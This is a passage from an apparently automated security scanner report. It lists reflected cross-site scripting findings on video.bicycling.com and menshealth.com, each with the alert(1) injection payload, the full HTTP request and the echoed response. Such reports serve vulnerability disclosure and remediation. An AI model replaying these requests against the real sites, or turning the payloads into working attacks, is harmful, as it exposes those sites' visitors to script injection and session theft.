Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-739820718-1299775174294

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: Accept-Encoding
Set-Cookie: mvp_session=6718ae9537f93a5668cd28d529e90e73; path=/; expires=Fri, 11-Mar-2011 16:41:49 GMT
Content-Type: Text/HTML
X-Cache: MISS from video.bicycling.com
X-Magnify-Cache-Eligible: YES
X-Magnify-Cached: No
Content-Length: 48395
Date: Thu, 10 Mar 2011 16:41:49 GMT
X-Varnish: 908945755
Age: 0
Via: 1.1 varnish
Connection: keep-alive


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
   
...[SNIP]...
help us improve Magnify.net.%0A%0AThanks for your help! -- The Magnify Team%0A%0A---%0A%0AStatus: 404 (File Not Found)%0ALink: http://video.bicycling.com/embed/player/container/298/275/C5QKZB153SRSPSH2a5d7b"><script>alert(1)</script>9abb6c75940%0AServer: video.bicycling.com%0APath: /embed/player/container/298/275/C5QKZB153SRSPSH2a5d7b">
...[SNIP]...

2.44. http://video.bicycling.com/embed/player/container/298/275/C5QKZB153SRSPSH2 [referrer parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.bicycling.com
Path:   /embed/player/container/298/275/C5QKZB153SRSPSH2

Issue detail

The value of the referrer request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f21bd'%3balert(1)//17703974801 was submitted in the referrer parameter. This input was echoed as f21bd';alert(1)//17703974801 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/player/container/298/275/C5QKZB153SRSPSH2?referrer=http%3A%2F%2Fwww.bicycling.com%2Fsites%2Fdefault%2Ffiles%2Fiframe_filter%2F268f584d3b19887c40f44a57f48e6677.htmlf21bd'%3balert(1)//17703974801 HTTP/1.1
Host: video.bicycling.com
Proxy-Connection: keep-alive
Referer: http://video.bicycling.com/embed/player/C5QKZB153SRSPSH2
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-739820718-1299775174294

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
X-Magnify-Edge-Control: cache-maxage=3600, dca=esi
Content-Type: text/html
X-Cache: MISS from video.bicycling.com
X-Magnify-Cache-Eligible: YES
X-Magnify-ESI-Done: YES
X-Magnify-Edge-Control-TTL: 3600
X-Magnify-Cached: YES
Content-Length: 85481
Date: Thu, 10 Mar 2011 16:40:44 GMT
X-Varnish: 908935604
Age: 0
Via: 1.1 varnish
Connection: keep-alive

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
   
       <title>Bicycling
...[SNIP]...
+ window.location.hostname + '/embed/player/C5QKZB153SRSPSH2;'
var magnifyReferrer = decodeURIComponent('http://www.bicycling.com/sites/default/files/iframe_filter/268f584d3b19887c40f44a57f48e6677.htmlf21bd';alert(1)//17703974801');

var magnifyViewer = '//w-c/C5QKZB153SRSPSH2';
var registrationRequired = false;


           var playerRoot = '/embed/player/';
           var componentRoot = '/embed/player/templates/compact/components/';
           va
...[SNIP]...

2.45. http://video.bicycling.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.bicycling.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 582f9"><script>alert(1)</script>5f6610e2d0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico582f9"><script>alert(1)</script>5f6610e2d0 HTTP/1.1
Host: video.bicycling.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-739820718-1299775174294; mvp_session=f899d191af7c22c1f7a0d0e1386c14d2

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: Accept-Encoding
Set-Cookie: mvp_session=f899d191af7c22c1f7a0d0e1386c14d2; path=/; expires=Fri, 11-Mar-2011 16:50:06 GMT
Content-Type: Text/HTML
X-Cache: MISS from video.bicycling.com
X-Magnify-Cache-Eligible: NO
X-Magnify-Cached: No
Content-Length: 47969
Date: Thu, 10 Mar 2011 16:50:06 GMT
X-Varnish: 909018290
Age: 0
Via: 1.1 varnish
Connection: keep-alive


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
   
...[SNIP]...
automatically generated email will help us improve Magnify.net.%0A%0AThanks for your help! -- The Magnify Team%0A%0A---%0A%0AStatus: 404 (File Not Found)%0ALink: http://video.bicycling.com/favicon.ico582f9"><script>alert(1)</script>5f6610e2d0%0AServer: video.bicycling.com%0APath: /favicon.ico582f9">
...[SNIP]...

2.46. http://video.bicycling.com/services/usage_request [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.bicycling.com
Path:   /services/usage_request

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 111bf"><script>alert(1)</script>927d1636d01 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /services111bf"><script>alert(1)</script>927d1636d01/usage_request?content_type=player&assoc_type=C&assoc_cid=21CQ460F9BWWZSF9 HTTP/1.1
Host: video.bicycling.com
Proxy-Connection: keep-alive
Referer: http://video.bicycling.com/embed/player/container/298/275/C5QKZB153SRSPSH2?referrer=http%3A%2F%2Fwww.bicycling.com%2Fsites%2Fdefault%2Ffiles%2Fiframe_filter%2F268f584d3b19887c40f44a57f48e6677.html
X-Prototype-Version: 1.6.0.3
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-739820718-1299775174294

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: Accept-Encoding
Set-Cookie: mvp_session=32fd78e5b8e565d81a8b753a695c4932; path=/; expires=Fri, 11-Mar-2011 16:43:12 GMT
Content-Type: Text/HTML
X-Cache: MISS from video.bicycling.com
X-Magnify-Cache-Eligible: NO
X-Magnify-Cached: No
Content-Length: 48575
Date: Thu, 10 Mar 2011 16:43:13 GMT
X-Varnish: 908958246
Age: 0
Via: 1.1 varnish
Connection: keep-alive


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
   
...[SNIP]...
his automatically generated email will help us improve Magnify.net.%0A%0AThanks for your help! -- The Magnify Team%0A%0A---%0A%0AStatus: 404 (File Not Found)%0ALink: http://video.bicycling.com/services111bf"><script>alert(1)</script>927d1636d01/usage_request%0AServer: video.bicycling.com%0APath: /services111bf">
...[SNIP]...

2.47. http://video.bicycling.com/services/usage_request [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.bicycling.com
Path:   /services/usage_request

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92a9f"><script>alert(1)</script>07c14eaacbf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /services/usage_request92a9f"><script>alert(1)</script>07c14eaacbf?content_type=player&assoc_type=C&assoc_cid=21CQ460F9BWWZSF9 HTTP/1.1
Host: video.bicycling.com
Proxy-Connection: keep-alive
Referer: http://video.bicycling.com/embed/player/container/298/275/C5QKZB153SRSPSH2?referrer=http%3A%2F%2Fwww.bicycling.com%2Fsites%2Fdefault%2Ffiles%2Fiframe_filter%2F268f584d3b19887c40f44a57f48e6677.html
X-Prototype-Version: 1.6.0.3
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-739820718-1299775174294

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: Accept-Encoding
Set-Cookie: mvp_session=03364444f44b5f5745218908ae105253; path=/; expires=Fri, 11-Mar-2011 16:43:15 GMT
Content-Type: Text/HTML
X-Cache: MISS from video.bicycling.com
X-Magnify-Cache-Eligible: NO
X-Magnify-Cached: No
Content-Length: 48575
Date: Thu, 10 Mar 2011 16:43:15 GMT
X-Varnish: 908958605
Age: 0
Via: 1.1 varnish
Connection: keep-alive


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
   
...[SNIP]...
lly generated email will help us improve Magnify.net.%0A%0AThanks for your help! -- The Magnify Team%0A%0A---%0A%0AStatus: 404 (File Not Found)%0ALink: http://video.bicycling.com/services/usage_request92a9f"><script>alert(1)</script>07c14eaacbf%0AServer: video.bicycling.com%0APath: /services/usage_request92a9f">
...[SNIP]...

2.48. http://www.menshealth.com/cda/expertlandingpage.do [site parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.menshealth.com
Path:   /cda/expertlandingpage.do

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4bfdb'%3balert(1)//57bc71cf34c was submitted in the site parameter. This input was echoed as 4bfdb';alert(1)//57bc71cf34c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cda/expertlandingpage.do?site=MensHealth4bfdb'%3balert(1)//57bc71cf34c&cm_re=HP-_-Footer-_-Experts HTTP/1.1
Host: www.menshealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cmTPSet=Y;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en
Cache-Control: max-age=1800
Date: Thu, 10 Mar 2011 16:46:47 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 89802

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">


<!-- Get URL attribute for cache
...[SNIP]...
<scri' + 'pt type="text/javascript" language="JavaScript" src="http://ad.doubleclick.net/adj/menshealth4bfdb';alert(1)//57bc71cf34c/experts;'+rasegs+';topic=' + topic + ';sbtpc=;cat=;kw=experts;tile=' + tile++ + ';slot=728x90.1;sz=728x90;dcopt=ist;ord=' + ord + '?" type="text/javascript">
...[SNIP]...

2.49. http://www.menshealth.com/cda/expertlandingpage.do [site parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.menshealth.com
Path:   /cda/expertlandingpage.do

Issue detail

The value of the site request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 540e5"><script>alert(1)</script>6cfa3a3c4c3 was submitted in the site parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cda/expertlandingpage.do?site=MensHealth540e5"><script>alert(1)</script>6cfa3a3c4c3&cm_re=HP-_-Footer-_-Experts HTTP/1.1
Host: www.menshealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cmTPSet=Y;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en
Cache-Control: max-age=1800
Date: Thu, 10 Mar 2011 16:46:46 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 89493

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">


<!-- Get URL attribute for cache
...[SNIP]...
<A HREF="http://ad.doubleclick.net/jump/menshealth540e5"><script>alert(1)</script>6cfa3a3c4c3/experts;'+rasegs+';topic=home;sbtpc=;cat=;kw=experts;tile=1;slot=728x90.1;sz=728x90;dcopt=ist;ord=123456?" TARGET="_blank">
...[SNIP]...

2.50. http://www.menshealth.com/cda/expertoverview.do [site parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.menshealth.com
Path:   /cda/expertoverview.do

Issue detail

The value of the site request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4afef"><script>alert(1)</script>8a0c6647d68 was submitted in the site parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cda/expertoverview.do?site=MensHealth4afef"><script>alert(1)</script>8a0c6647d68&channel=experts&expertId=1c74f5b65fa53010VgnVCM100000cfe793cd____ HTTP/1.1
Host: www.menshealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cmTPSet=Y;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en
Cache-Control: max-age=1800
Date: Thu, 10 Mar 2011 16:46:43 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 100174

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">


<!-- Get URL attribute for cache
...[SNIP]...
<A HREF="http://ad.doubleclick.net/jump/menshealth4afef"><script>alert(1)</script>8a0c6647d68/guywisdom;'+rasegs+';topic=home;sbtpc=;cat=;kw=experts;kw=menshealth;tile=1;slot=728x90.1;sz=728x90;dcopt=ist;ord=123456?" TARGET="_blank">
...[SNIP]...

2.51. http://www.menshealth.com/cda/expertoverview.do [site parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.menshealth.com
Path:   /cda/expertoverview.do

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3a4dd'%3balert(1)//e391d25fef was submitted in the site parameter. This input was echoed as 3a4dd';alert(1)//e391d25fef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cda/expertoverview.do?site=MensHealth3a4dd'%3balert(1)//e391d25fef&channel=experts&expertId=1c74f5b65fa53010VgnVCM100000cfe793cd____ HTTP/1.1
Host: www.menshealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cmTPSet=Y;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en
Cache-Control: max-age=1800
Date: Thu, 10 Mar 2011 16:46:44 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 97896

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">


<!-- Get URL attribute for cache
...[SNIP]...
<scri' + 'pt type="text/javascript" language="JavaScript" src="http://ad.doubleclick.net/adj/menshealth3a4dd';alert(1)//e391d25fef/guywisdom;'+rasegs+';topic=' + topic + ';sbtpc=;cat=;kw=experts;kw=menshealth;tile=' + tile++ + ';slot=728x90.1;sz=728x90;dcopt=ist;ord=' + ord + '?" type="text/javascript">
...[SNIP]...

2.52. http://www.menshealth.com/cda/featured_video.do [site parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.menshealth.com
Path:   /cda/featured_video.do

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d6a39'%3balert(1)//aadf88daed5 was submitted in the site parameter. This input was echoed as d6a39';alert(1)//aadf88daed5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cda/featured_video.do?site=MensHealthd6a39'%3balert(1)//aadf88daed5&channel=video HTTP/1.1
Host: www.menshealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cmTPSet=Y;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en
Cache-Control: max-age=1800
Date: Thu, 10 Mar 2011 16:46:43 GMT
Content-Length: 23266
Connection: close

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">


<!-- Get URL attribute for cache key -->


<!-- Toggle print mode
...[SNIP]...
<scri' + 'pt type="text/javascript" language="JavaScript" src="http://ad.doubleclick.net/adj/menshealthd6a39';alert(1)//aadf88daed5/video;'+rasegs+';topic=' + topic + ';sbtpc=home;cat=;kw=;tile=' + tile++ + ';slot=728x90.1;sz=728x90;dcopt=ist;ord=' + ord + '?" type="text/javascript">
...[SNIP]...

2.53. http://www.menshealth.com/cda/featured_video.do [site parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.menshealth.com
Path:   /cda/featured_video.do

Issue detail

The value of the site request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ca72"><script>alert(1)</script>a3f226141f1 was submitted in the site parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cda/featured_video.do?site=MensHealth9ca72"><script>alert(1)</script>a3f226141f1&channel=video HTTP/1.1
Host: www.menshealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cmTPSet=Y;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en
Cache-Control: max-age=1800
Date: Thu, 10 Mar 2011 16:46:43 GMT
Content-Length: 23484
Connection: close

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">


<!-- Get URL attribute for cache key -->


<!-- Toggle print mode
...[SNIP]...
<A HREF="http://ad.doubleclick.net/jump/menshealth9ca72"><script>alert(1)</script>a3f226141f1/video;'+rasegs+';topic=home;sbtpc=home;cat=;kw=;tile=1;slot=728x90.1;sz=728x90;dcopt=ist;ord=123456?" TARGET="_blank">
...[SNIP]...

2.54. http://www.menshealth.com/cda/toolsandquizzes_index.do [category parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.menshealth.com
Path:   /cda/toolsandquizzes_index.do

Issue detail

The value of the category request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 56870"%3balert(1)//5a12c3692f5 was submitted in the category parameter. This input was echoed as 56870";alert(1)//5a12c3692f5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cda/toolsandquizzes_index.do?channel=customerservice&category=toolsquizzes56870"%3balert(1)//5a12c3692f5&topic=toollist HTTP/1.1
Host: www.menshealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cmTPSet=Y;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en
Cache-Control: max-age=1800
Date: Thu, 10 Mar 2011 16:47:12 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 124855

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>


<!-- Get URL attribute for cac
...[SNIP]...
<!-- hide from non-JavaScript browsers
                   var ord=Math.random()*10000000000000000;
                   var tile= 1;
                   var num = ord + "?";                    
                   
                                       
                                           var topic= "toolsquizzes56870";alert(1)//5a12c3692f5";
                   
                   
                                                               var sbtpc= "toollist";
                   
               // end hide from browsers -->
...[SNIP]...

2.55. http://www.menshealth.com/cda/toolsandquizzes_index.do [category parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.menshealth.com
Path:   /cda/toolsandquizzes_index.do

Issue detail

The value of the category request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8bb78"><script>alert(1)</script>4c3050c065a was submitted in the category parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cda/toolsandquizzes_index.do?channel=customerservice&category=toolsquizzes8bb78"><script>alert(1)</script>4c3050c065a&topic=toollist HTTP/1.1
Host: www.menshealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cmTPSet=Y;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en
Cache-Control: max-age=1800
Date: Thu, 10 Mar 2011 16:47:11 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 101160

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>


<!-- Get URL attribute for cac
...[SNIP]...
<A HREF="http://ad.doubleclick.net/jump/menshealth/customerservice;'+rasegs+';topic=toolsquizzes8bb78"><script>alert(1)</script>4c3050c065a;sbtpc=toollist;cat=;kw=;tile=1;slot=728x90.1;sz=728x90;dcopt=ist;ord=123456?" TARGET="_blank">
...[SNIP]...

2.56. http://www.menshealth.com/cda/toolsandquizzes_index.do [topic parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.menshealth.com
Path:   /cda/toolsandquizzes_index.do

Issue detail

The value of the topic request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2abf0"%3balert(1)//c98f1481 was submitted in the topic parameter. This input was echoed as 2abf0";alert(1)//c98f1481 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cda/toolsandquizzes_index.do?channel=customerservice&category=toolsquizzes&topic=toollist2abf0"%3balert(1)//c98f1481 HTTP/1.1
Host: www.menshealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cmTPSet=Y;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en
Cache-Control: max-age=1800
Date: Thu, 10 Mar 2011 16:47:18 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 124681

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>


<!-- Get URL attribute for cac
...[SNIP]...
d=Math.random()*10000000000000000;
                   var tile= 1;
                   var num = ord + "?";                    
                   
                                       
                                           var topic= "toolsquizzes";
                   
                   
                                                               var sbtpc= "toollist2abf0";alert(1)//c98f1481";
                   
               // end hide from browsers -->
...[SNIP]...

2.57. http://www.menshealth.com/downloads/all/ [cm_sp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.menshealth.com
Path:   /downloads/all/

Issue detail

The value of the cm_sp request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e26d"><script>alert(1)</script>93c4e0a1d98 was submitted in the cm_sp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/all/?download_type=iPhone%20App&cm_sp=apple-_-MHWorkouts-_-downloadcenter7e26d"><script>alert(1)</script>93c4e0a1d98 HTTP/1.1
Host: www.menshealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cmTPSet=Y;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Content-Type: text/html; charset=utf-8
Expires: Thu, 10 Mar 2011 16:47:36 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 10 Mar 2011 16:47:36 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=2oqvi6274e7lprjf428ai2jdr1; path=/
Content-Length: 56773

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><meta ht
...[SNIP]...
<a href="http://www.menshealth.com/cda/initLogin.do?callback=http://www.menshealth.com/downloads/all/?download_type=iPhone%20App&cm_sp=apple-_-MHWorkouts-_-downloadcenter7e26d"><script>alert(1)</script>93c4e0a1d98">
...[SNIP]...

2.58. http://www.menshealth.com/downloads/all/ [download_type parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.menshealth.com
Path:   /downloads/all/

Issue detail

The value of the download_type request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72bcf"><script>alert(1)</script>66fdd6e76a1 was submitted in the download_type parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/all/?download_type=iPhone%20App72bcf"><script>alert(1)</script>66fdd6e76a1&cm_sp=apple-_-MHWorkouts-_-downloadcenter HTTP/1.1
Host: www.menshealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cmTPSet=Y;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Content-Type: text/html; charset=utf-8
Expires: Thu, 10 Mar 2011 16:47:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 10 Mar 2011 16:47:34 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=n78bqspif5ahsq5qf2uoi2dvl4; path=/
Content-Length: 45768

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><meta ht
...[SNIP]...
<a href="http://www.menshealth.com/cda/initLogin.do?callback=http://www.menshealth.com/downloads/all/?download_type=iPhone%20App72bcf"><script>alert(1)</script>66fdd6e76a1&cm_sp=apple-_-MHWorkouts-_-downloadcenter">
...[SNIP]...

2.59. http://www.menshealth.com/downloads/all/ [download_type parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.menshealth.com
Path:   /downloads/all/

Issue detail

The value of the download_type request parameter is copied into the HTML document as plain text between tags. The payload fbea4<script>alert(1)</script>e1489106aca was submitted in the download_type parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/all/?download_type=iPhone%20Appfbea4<script>alert(1)</script>e1489106aca&cm_sp=apple-_-MHWorkouts-_-downloadcenter HTTP/1.1
Host: www.menshealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cmTPSet=Y;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Content-Type: text/html; charset=utf-8
Expires: Thu, 10 Mar 2011 16:47:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 10 Mar 2011 16:47:35 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=nud9q64h4if55c09a5esja6rf7; path=/
Set-Cookie: BIGipServermh-mini=1260366016.20480.0000; path=/
Content-Length: 45764

